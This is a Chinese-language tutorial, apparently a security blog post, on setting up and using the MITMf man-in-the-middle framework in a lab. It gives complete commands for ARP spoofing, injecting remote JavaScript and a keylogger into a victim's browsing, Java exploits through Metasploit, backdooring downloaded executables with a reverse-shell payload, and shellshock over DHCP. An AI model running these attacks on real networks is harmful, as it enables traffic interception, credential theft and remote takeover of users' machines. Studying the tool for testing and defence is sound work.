聲明：本文具有一定攻擊性，僅作為技術(shù)交流和安全教學(xué)之用，不要用在除了搭建環(huán)境之外的環(huán)境。

0×01 題記

又是一年十月一，想到小伙伴們都紛紛出門旅游，皆有美酒佳人相伴，想到這里，不禁潸然淚下。子曰：“長(zhǎng)得丑就要多讀書！”于是有了這篇文章。

0×02 簡(jiǎn)要介紹

這篇文章的主要目的是介紹一下一個(gè)最新的中間人攻擊測(cè)試框架 – MITMf。工具的作者是byt3bl33d3r，是基于代理工具sergio-proxy修改而來。這里是工具的地址：

https://github.com/byt3bl33d3r/MITMf

關(guān)于工具的一些簡(jiǎn)介也在git的READEME中說到了。工具本身比較新，沒找到中文指南，這里就寫一篇文章與大家一起交流探討。

剛一看到這個(gè)工具的時(shí)候，第一感覺不過是一個(gè)中間人攻擊的集合品，也沒多大興趣。本來嘛，這個(gè)概念也已經(jīng)被談爛了。但是當(dāng)我真的搭好環(huán)境開始玩的時(shí)候才發(fā)現(xiàn)其實(shí)這個(gè)框架還是有點(diǎn)意思的，可擴(kuò)展性非常高。除了“劫持”的概念外，一些插件也起到了“滲透”的作用。

0×03 工具配置

MITMf不支持多系統(tǒng)平臺(tái)，雖然是python寫的，但是玩過以后才發(fā)現(xiàn)根本就是給linux量身做的，所以這里想玩的同學(xué)如果是win環(huán)境的話，可以考慮用虛擬機(jī)了，這里建議使用Kali/Linux。

首先git下整個(gè)框架

#git clone https://github.com/byt3bl33d3r/MITMf.git /opt/mitmf/

然后我們進(jìn)行簡(jiǎn)單的安裝

cd /opt/mitmf
./install-bdfactory.sh

完成之后，進(jìn)行下一步的安裝操作

cd bdfactory/
./install.sh

然后，運(yùn)行的時(shí)候我們會(huì)發(fā)現(xiàn)仍然沒辦法啟動(dòng)MITMf，會(huì)提示一些模塊缺失，我們按照指示說的依次用pip安裝一下就可以。

這里需要注意一點(diǎn)，因?yàn)椴糠帜�塊的源是在google上面的，pip會(huì)安裝不上（如pefile），這時(shí)候可以自己去https://pypi.python.org/pypi 下載一下然后手動(dòng)安裝，安裝命令是

python xxxx install

另外，需要自行手動(dòng)安裝python-nfqueue模塊

sudo apt-get install python-nfqueue

0×04 基本功能：cookies盜取，dns劫持，js注入…

這時(shí)候我們應(yīng)該能夠成功啟動(dòng)mitmf了。輸入./mitmf.py -h 得到以下幫助界面：

[未標(biāo)題-1.png]

工具有幾項(xiàng)基本功能：

sslstrip模塊

這個(gè)我不多說大家也都能明白，默認(rèn)是開啟的狀態(tài)。這里我嘗試了用-d參數(shù)關(guān)閉了sslstrip，但是出現(xiàn)了無法使用的情況，應(yīng)該是框架本身的bug。

Filepwn模塊

主要作用是當(dāng)被欺騙對(duì)象嘗試下載文件時(shí)，首先對(duì)文件進(jìn)行分析，對(duì)可執(zhí)行文件（PE、ELF）進(jìn)行后門注入，然后再給到被欺騙對(duì)象，這個(gè)下面我還會(huì)給出詳細(xì)的說明。

Cachekill模塊

清空客戶端的緩存緩沖池，這個(gè)在我們需要重新注入一段js時(shí)是很有用的。這個(gè)功能還是非常有用的，關(guān)于用處，大家可以參考EtherDream同學(xué)的JS緩存投毒的文章，不細(xì)說。

Spoof模塊

十分重要的一個(gè)模塊，當(dāng)我們使用MITM功能攻擊欺騙時(shí)絕對(duì)是不能缺少的。其主要包括對(duì)ARP、ICMP、DHCP進(jìn)行流量重定向（三種模式不能同時(shí)使用），手動(dòng)指定iptables命令等，其他的規(guī)則文件（cfg文件）在主目錄的config目錄下，我們可以進(jìn)行自定義配置。這里值得說一下是，工具還在前幾天更新了關(guān)于“破殼”漏洞的DHCP影響，我們可以通過shellshock參數(shù)進(jìn)行指定。下面我也會(huì)有圖片進(jìn)行證明演示。

BeEFAutorun模塊

該模塊可以使框架可以連接到BeEF，BeEF的強(qiáng)大我想大家是有目共睹的。連接到BeEF之后就可以將MITM與瀏覽器滲透結(jié)合起來，功能自然更強(qiáng)大，姿勢(shì)，也更猥瑣了。

Replace模塊

這個(gè)模塊主要是可以對(duì)瀏覽內(nèi)容進(jìn)行替換，支持正則表達(dá)式。注意，這里模塊默認(rèn)情況下是強(qiáng)制刷新緩存緩沖池的，要想不改變緩沖內(nèi)容，需要手動(dòng)指定keep-cache參數(shù)。

Inject模塊

可以向被欺騙者的瀏覽內(nèi)容中注入各種猥瑣的東西，比如js啦，html啦，圖片啦，小電影啦。。。也是比較有用的一個(gè)模塊，下文我們還會(huì)說到。

Browser Profiler插件

枚舉被欺騙機(jī)器的瀏覽器插件。對(duì)于我們前期的信息收集階段還是很有用的。

JavaPwn模塊

可以通過向被攻擊機(jī)器中注入jar使得瀏覽內(nèi)容被毒化，和metasploit聯(lián)合可以直接滲透機(jī)器拿到shell（這點(diǎn)后文我也會(huì)重點(diǎn)說），metasploit有多強(qiáng)大玩滲透的同學(xué)沒有不知道的吧？不知道的先出去罰站半小時(shí)（鄙人metasploit死忠粉）

Javascript Keylogger模塊

一個(gè)鍵盤記錄js，后文會(huì)有介紹

App Cache Poison

app緩存投毒。對(duì)于網(wǎng)頁(yè)應(yīng)用程序進(jìn)行毒化處理，然后進(jìn)行隨心所欲的攻擊。是Krzysztof Kotowicz的補(bǔ)充模塊。

Upsidedownternet

惡搞模塊，讓瀏覽者的世界翻轉(zhuǎn)。

以上是工具的簡(jiǎn)單介紹，其中不少是很多功能大家都已經(jīng)玩過了，所以我就單挑幾個(gè)給大家展示一下。

Inject模塊的注入功能

我們首先注入一個(gè)html：

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --inject --html-url http://www.freebuf.com

效果圖

[12.png]

[13.png]

然后我們?cè)僮⑷胍粋�(gè)js看看：

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --inject --js-url http://linvex.xxx.cn/test.js

效果圖

[15.png]

[16.png]

然后是工具自帶的keylogger的js，我們看一下效果怎么樣：

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --jskeylogger

效果圖

[10.png]

[11.png]

經(jīng)測(cè)試，密碼截獲DNS劫持什么的都不是問題，這里鑒于篇幅就不再展示了。

0×05 進(jìn)階玩法

以上是我們進(jìn)行的一些基本的玩法，目的只是讓大家看一下。功能比較基礎(chǔ)大家用的也比較多，接下來的部分，主要給大家展示一下該框架是如何結(jié)合強(qiáng)大的metasploit進(jìn)行“滲透”的。

（一）利用java漏洞進(jìn)行攻擊

首先，我們使用的是javapwn模塊。這個(gè)模塊事實(shí)上就是根據(jù)客戶端的java版本從msf挑出攻擊payload進(jìn)行溢出滲透攻擊的過程，只不過是將注入的過程加入到了ARP欺騙的過程而不是之前演示的那種直接給客戶端一個(gè)url（類似：http://192.168.111.111/UIhsdaVx），使得攻擊更為自然。

將metasploit打開，然后載入msgrpc模塊

#msfconsole
msf > load msgrpc Pass=abc123

其他部分保持默認(rèn)就好了。然后是MITMf端，輸入以下命令：

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --javapwn --msfip 192.168.217.137

然后我們就只需要等待就可以了，喝杯咖啡等一下。。這個(gè)過程我們可以看到靶機(jī)所瀏覽的一些網(wǎng)站記錄同時(shí)我們也能接收到一些毒化html的反饋信息。

如果順利，我們的jar就被執(zhí)行了。

[20.png]

這是開始運(yùn)行等待的時(shí)候

[18.png]

[19.png]

成功得到shell

這兩張是成功得到shell的界面。因?yàn)槲业陌袡C(jī)中的java是最新的，msf中的payload無法溢出，只是在靶機(jī)中生成了無數(shù)的連接。所以這里的圖是盜的。

（二）為PE文件注入后門實(shí)現(xiàn)滲透

使用Filepwn模塊，與msf結(jié)合同樣可以獲得shell。簡(jiǎn)單說一下Filepwn的原理：ARP過程中如果探測(cè)到靶機(jī)有下載的活動(dòng)，便劫持下載鏈接，首先將文件下載下來進(jìn)行解包分析，如果是可執(zhí)行文件就嘗試注入后門，如果失敗則重新打包。最后將文件輸出給靶機(jī)由靶機(jī)進(jìn)行下載。這里的文檔支持zip和tar.gz格式解包，支持各種可執(zhí)行文件。

同樣我們打開metasploit，使用handler，開始監(jiān)聽：

msfconsole
use exploit/multi/handler
set LHOST 192.168.217.137
set LPORT 1447
run

[21.png]

在使用MITMf前我們需要對(duì)配置文件進(jìn)行配置，注入信息配置如下（只列出作用位置）

…………SNIP…………
[[[WindowsIntelx86]]]       
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND       
HOST = 192.168.217.137       
PORT = 1447       
SHELL = reverse_shell_tcp       
SUPPLIED_SHELLCODE = None       
ZERO_CERT = False       
PATCH_DLL = True       
MSFPAYLOAD = windows/shell_reverse_tcp
…………SNIP…………

接下來是MITMf：

./mitmf.py --iface eth0 --spoof --arp --gateway 192.168.217.2 --target 192.168.217.129 --filepwn

然后就是等待靶機(jī)下載文件然后執(zhí)行就可以了。

最后我們的靶機(jī)執(zhí)行了文件，然后msf獲得到了shell。下面是最終結(jié)果：

[9.jpg]


點(diǎn)此看大圖

（三）娛樂一下

最后再看一下“破殼”是如何在DHCP中起作用的

./mitmf.py --iface eth0 --spoof --dhcp --shellshock

[17.png]

這里的命令可以用cmd參數(shù)自行指定。

關(guān)于這個(gè)問題大家一致的思路是這樣的：我們的手機(jī)IOS、Android都是基于unix的，所以如果我們搭建一個(gè)dhcp的WIFI服務(wù)器，能有什么收獲呢？

0×06 總結(jié)

這個(gè)工具其實(shí)說白了就是一個(gè)中間人攻擊的大集合，集各種功能于一身，同時(shí)擴(kuò)展了BeEF框架和Metasploit的接口，使攻擊姿勢(shì)更加豐富。而且，也十分與時(shí)俱進(jìn)的擴(kuò)展了網(wǎng)頁(yè)應(yīng)用的毒化功能，同時(shí)給我們帶來了更多的想法：中間人攻擊，真的只是劫持截包這么簡(jiǎn)單么？?jī)?nèi)網(wǎng)滲透真的只能靠溢出RCE方式么？能不能有更好的方式？答案是肯定的！：）

文章到這里暫時(shí)告一段落，簡(jiǎn)要介紹了幾個(gè)MITMf的基礎(chǔ)功能，更多擴(kuò)展工具閱讀

https://github.com/secretsquirrel/the-backdoor-factory

https://github.com/secretsquirrel/BDFProxy

如果有更好玩的東西，我會(huì)繼續(xù)與大家分享。

0×07 最后的小插曲

寫文章的前一天晚上，室友看我測(cè)試各種攻擊姿勢(shì)，然后看了一會(huì)兒感嘆說，網(wǎng)絡(luò)越來越不安全了，真是處處是坑，一不小心就可能中招。然后，我們相視苦笑。。。

現(xiàn)在，問題來了：挖坑得用挖掘機(jī)。